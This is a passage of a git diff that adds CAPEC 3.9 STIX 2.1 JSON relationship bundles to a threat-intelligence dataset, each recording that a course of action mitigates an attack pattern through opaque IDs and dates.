"attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac.json new file mode 100644 index 0000000000000000000000000000000000000000..3c233e4c1a3c44b0c4571b1b3f024966f57e9830 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c7ea2369-7747-49e9-bd1c-664eefc9b624", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4fec7a6-c3eb-48d8-b840-e4fad7c771c8", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b91c573-2031-4024-a179-a9a719c76d8a.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b91c573-2031-4024-a179-a9a719c76d8a.json new file mode 100644 index 0000000000000000000000000000000000000000..59d08630d8d0e2ead19339497a2cfe32a69036de --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b91c573-2031-4024-a179-a9a719c76d8a.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--ee9c8e47-8066-4518-b507-ed3731c070f5", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b91c573-2031-4024-a179-a9a719c76d8a", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8395680e-e9c6-4c7b-a94f-e5d4bdd9e5c0", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332.json new file mode 100644 index 0000000000000000000000000000000000000000..7949f06beb6f1d8476778abddd9573a48e57be0f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--9462bfb7-7362-4d47-ad26-74511342f899", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--638372f7-a792-4269-acd6-cfb761391fd6", + "spec_version": "2.1", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0.json new file mode 100644 index 0000000000000000000000000000000000000000..151d8becc91990cdb471ca1064e858f1efcc5a88 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c5ec269d-7222-4177-b40d-b363ccbedcc1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6bd7c5b7-b55f-4fac-a850-306a427dbaf8", + "spec_version": "2.1", + "target_ref": "attack-pattern--a7cc8cb3-8652-4669-893a-baaa21f7eb55", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0c786816-7b0c-4fe7-b657-7e339aea5498.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0c786816-7b0c-4fe7-b657-7e339aea5498.json new file mode 100644 index 0000000000000000000000000000000000000000..1ac34f62368640adfb6b8de3e01a2f99130ff4e3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0c786816-7b0c-4fe7-b657-7e339aea5498.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--1913b5f7-244d-4e64-90bc-6814d185b59b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0c786816-7b0c-4fe7-b657-7e339aea5498", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8cee0cf-4567-40f0-a8d6-0b1d71c03c27", + "spec_version": "2.1", + "target_ref": "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0cad5809-fa6b-4947-9d83-2c2e462c3f42.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0cad5809-fa6b-4947-9d83-2c2e462c3f42.json new file mode 100644 index 0000000000000000000000000000000000000000..431123ae062ee67fa6419766d9e0a152352098b7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0cad5809-fa6b-4947-9d83-2c2e462c3f42.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--d32d1c7f-8cf3-49a0-b5ec-22c50dc02ae8", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cad5809-fa6b-4947-9d83-2c2e462c3f42", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0cbb16a5-1749-47ba-8527-a912d9298189.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0cbb16a5-1749-47ba-8527-a912d9298189.json new file mode 100644 index 0000000000000000000000000000000000000000..c2655dff2b05dd8e42d20eb1cdcf1b8385c42b72 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0cbb16a5-1749-47ba-8527-a912d9298189.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--f03126b5-6ec5-4ebe-9837-959d8e4dbc11", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cbb16a5-1749-47ba-8527-a912d9298189", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6acfbc2d-97e0-447f-a683-2eebc9157e84", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d553a19-deeb-45df-b70d-71110b119c7c.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d553a19-deeb-45df-b70d-71110b119c7c.json new file mode 100644 index 0000000000000000000000000000000000000000..930a5673a7ecf1059d1f8f197036eff80a68ff58 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d553a19-deeb-45df-b70d-71110b119c7c.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--b706486c-3a26-424f-8134-82c3b35b19f7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0d553a19-deeb-45df-b70d-71110b119c7c", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b187831e-a53c-465d-b72f-49df78479e67", + "spec_version": "2.1", + "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d8b1972-e844-4991-a884-ca3e967a6e8d.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d8b1972-e844-4991-a884-ca3e967a6e8d.json new file mode 100644 index 0000000000000000000000000000000000000000..0bd60fe3db18038c7f945534d2b5a3f117eaf807 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d8b1972-e844-4991-a884-ca3e967a6e8d.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--42d3c6fc-fa1e-4c55-8400-d0d4d1269444", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0d8b1972-e844-4991-a884-ca3e967a6e8d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "spec_version": "2.1", + "target_ref": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d9de774-ac83-4ac5-b974-c2cce00ad5f8.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d9de774-ac83-4ac5-b974-c2cce00ad5f8.json new file mode 100644 index 0000000000000000000000000000000000000000..383b37355d8870126cce68c4c77db0095ef9ba6d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d9de774-ac83-4ac5-b974-c2cce00ad5f8.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--9f519a28-3eac-4d99-a279-3194f396a8b8", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0d9de774-ac83-4ac5-b974-c2cce00ad5f8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50db6d91-2bb0-4ba5-a1f5-230d474e54ca", + "spec_version": "2.1", + "target_ref": "attack-pattern--966f2983-596b-4e3b-b809-52f5576478c9", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0df6edf6-1157-43d2-8e50-4b6184d75a60.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0df6edf6-1157-43d2-8e50-4b6184d75a60.json new file mode 100644 index 0000000000000000000000000000000000000000..3d308b29b43e7a7b25d5e81c1155d3f78a64fd38 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0df6edf6-1157-43d2-8e50-4b6184d75a60.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--a5f0aafd-c2a0-42d2-ac9a-f5aa532e0059", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0df6edf6-1157-43d2-8e50-4b6184d75a60", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dd700183-d761-44fa-ac56-b6a20cc2cb3c", + "spec_version": "2.1", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0e96b154-0ac9-46dd-ada2-cfa26af58e40.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0e96b154-0ac9-46dd-ada2-cfa26af58e40.json new file mode 100644 index 0000000000000000000000000000000000000000..cd5c4ff8cd2af27179c6fe120da340a4c3580663 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0e96b154-0ac9-46dd-ada2-cfa26af58e40.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--51de6da8-c2a3-4dce-af68-02853b843a23", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e96b154-0ac9-46dd-ada2-cfa26af58e40", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--dc7176bc-62c9-4fad-9036-5f5079477a3a.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--dc7176bc-62c9-4fad-9036-5f5079477a3a.json new file mode 100644 index 0000000000000000000000000000000000000000..93526713bd1c43179d6c73ff9b925004155a8e10 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--dc7176bc-62c9-4fad-9036-5f5079477a3a.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--bc4e9450-361f-4291-b508-40a8fa462bc9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc7176bc-62c9-4fad-9036-5f5079477a3a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--defdb513-7363-40a3-a5c5-41ca51464c89.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--defdb513-7363-40a3-a5c5-41ca51464c89.json new file mode 100644 index 0000000000000000000000000000000000000000..b8e9ab86dba81c809894e4eb0f964af696286093 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--defdb513-7363-40a3-a5c5-41ca51464c89.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--a4c17514-e26e-4e2d-9397-0e537a5c73db", + "objects": [ + { + "created": "2018-04-25T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--defdb513-7363-40a3-a5c5-41ca51464c89", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--25c25dbf-033d-40de-8314-255ce51d1e3d", + "spec_version": "2.1", + "target_ref": "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e108a43f-d09d-41e1-8c5d-d88b4e285dc8.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e108a43f-d09d-41e1-8c5d-d88b4e285dc8.json new file mode 100644 index 0000000000000000000000000000000000000000..8eecac22099458f38ed7c3198e95a1bfa2ef9482 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e108a43f-d09d-41e1-8c5d-d88b4e285dc8.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--f80492ad-fcff-4b11-920c-99f8b4c37c61", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e108a43f-d09d-41e1-8c5d-d88b4e285dc8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e351819c-a8ce-4628-bc2d-fe25172f524f.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e351819c-a8ce-4628-bc2d-fe25172f524f.json new file mode 100644 index 0000000000000000000000000000000000000000..edeb45c46b6a7d8f4da151e64bc1c532d767e7f7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e351819c-a8ce-4628-bc2d-fe25172f524f.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c74a050e-ad3d-41a6-9e21-ff2e2ce4b049", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e351819c-a8ce-4628-bc2d-fe25172f524f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60c73cc1-5718-4246-a2a6-da180705e463", + "spec_version": "2.1", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e5a3a69d-5435-4dc8-a832-08dc60fcbd8f.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e5a3a69d-5435-4dc8-a832-08dc60fcbd8f.json new file mode 100644 index 0000000000000000000000000000000000000000..4ac348e63451782ca7b362dedc6610352c286d20 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e5a3a69d-5435-4dc8-a832-08dc60fcbd8f.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--33f25821-76ba-486c-91fa-d9786a57c02d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e5a3a69d-5435-4dc8-a832-08dc60fcbd8f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "spec_version": "2.1", + "target_ref": "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e8e7946c-f260-48f6-8601-b5bd6d149921.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e8e7946c-f260-48f6-8601-b5bd6d149921.json new file mode 100644 index 0000000000000000000000000000000000000000..efac0f3b36fe3f3bf24689d7cb679a63152bd5cc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e8e7946c-f260-48f6-8601-b5bd6d149921.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--4894389e-84ce-4b39-aa10-53fc83dc9f12", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8e7946c-f260-48f6-8601-b5bd6d149921", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b126246b-e773-4c81-af2f-40d1dcfb2160", + "spec_version": "2.1", + "target_ref": "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--eb4b5528-6e2e-4670-bfd3-983606f61020.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--eb4b5528-6e2e-4670-bfd3-983606f61020.json new file mode 100644 index 0000000000000000000000000000000000000000..dd88ab66aa37cb2812b8b883c0862941040ca44a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--eb4b5528-6e2e-4670-bfd3-983606f61020.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e919c6c0-9161-4205-8292-a661f6cb4d1e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb4b5528-6e2e-4670-bfd3-983606f61020", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--db00ffba-8edb-4b26-be69-98de08e8b45c", + "spec_version": "2.1", + "target_ref": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ed0e71de-8def-40f3-9a63-1cdcb946c954.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ed0e71de-8def-40f3-9a63-1cdcb946c954.json new file mode 100644 index 0000000000000000000000000000000000000000..a13f63c6a19055baadb73f83e622c4e214c5c669 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ed0e71de-8def-40f3-9a63-1cdcb946c954.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--308a297f-e4e0-4b51-bfc1-5be7b6d09fd4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ed0e71de-8def-40f3-9a63-1cdcb946c954", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b7572ea-6dc7-4734-810a-1dd9611f435e", + "spec_version": "2.1", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--eed85688-d26a-4cec-8582-4ad1e158cdb3.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--eed85688-d26a-4cec-8582-4ad1e158cdb3.json new file mode 100644 index 0000000000000000000000000000000000000000..59a08f82d4b000272c4a7052c804b0ba960e9513 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--eed85688-d26a-4cec-8582-4ad1e158cdb3.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--088bc281-c39e-4d2b-afb2-c5a08393dff2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eed85688-d26a-4cec-8582-4ad1e158cdb3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "spec_version": "2.1", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f0901a46-1e3d-454b-aabc-5d7a0983c5b6.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f0901a46-1e3d-454b-aabc-5d7a0983c5b6.json new file mode 100644 index 0000000000000000000000000000000000000000..f08b5e19e72d59e360ea0f29c164a52426efa893 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f0901a46-1e3d-454b-aabc-5d7a0983c5b6.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--9a946e5c-fe08-44de-9869-33d2170f890b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0901a46-1e3d-454b-aabc-5d7a0983c5b6", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c9cdf1e-85f9-47f9-9628-f55b7c41c408", + "spec_version": "2.1", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f27d7fdd-9727-4b1e-852a-80cea8641b62.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f27d7fdd-9727-4b1e-852a-80cea8641b62.json new file mode 100644 index 0000000000000000000000000000000000000000..39b26d1a912a561ab35df354b9e59ae8e30d6191 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f27d7fdd-9727-4b1e-852a-80cea8641b62.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--0aa2aca4-71d6-4db4-90f0-11f630c74e91", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f27d7fdd-9727-4b1e-852a-80cea8641b62", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22eb9bea-93ce-4bec-b575-33aa10b6766a", + "spec_version": "2.1", + "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git 